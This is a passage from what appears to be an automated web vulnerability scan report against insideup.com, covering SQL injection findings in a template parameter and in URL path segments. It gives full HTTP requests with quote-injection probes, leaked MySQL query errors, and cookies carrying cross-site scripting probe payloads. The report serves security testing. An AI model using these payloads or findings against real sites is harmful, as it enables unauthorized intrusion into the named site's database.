OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:36:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ioo791vp0qnu5j0urkdtqpej17; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:36:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=khmn5d5v0vktraj9e0ilugc7k4; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/project_dynamic_page_updated.php was not found on this server.</p>

1.393. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6b28c6h2ov52ujb8mb5bmm25l1; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3'' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&templa' at line 5

Request 2

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lr0391m7c1gpdjjnf48id84a27; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/project_dynamic_page_updated.php was not found on this server.</p>

1.394. http://www.insideup.com/ppc/leadflow/incn00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:36:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i0hm7o36ccgq7vmt3jlr3ih8v2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5

Request 2

GET /ppc/leadflow''/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:36:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=79p5gdnj274j3ou97gl8atlat3; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/incn00/project.php was not found on this server.</p>

1.395. http://www.insideup.com/ppc/leadflow/incn00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

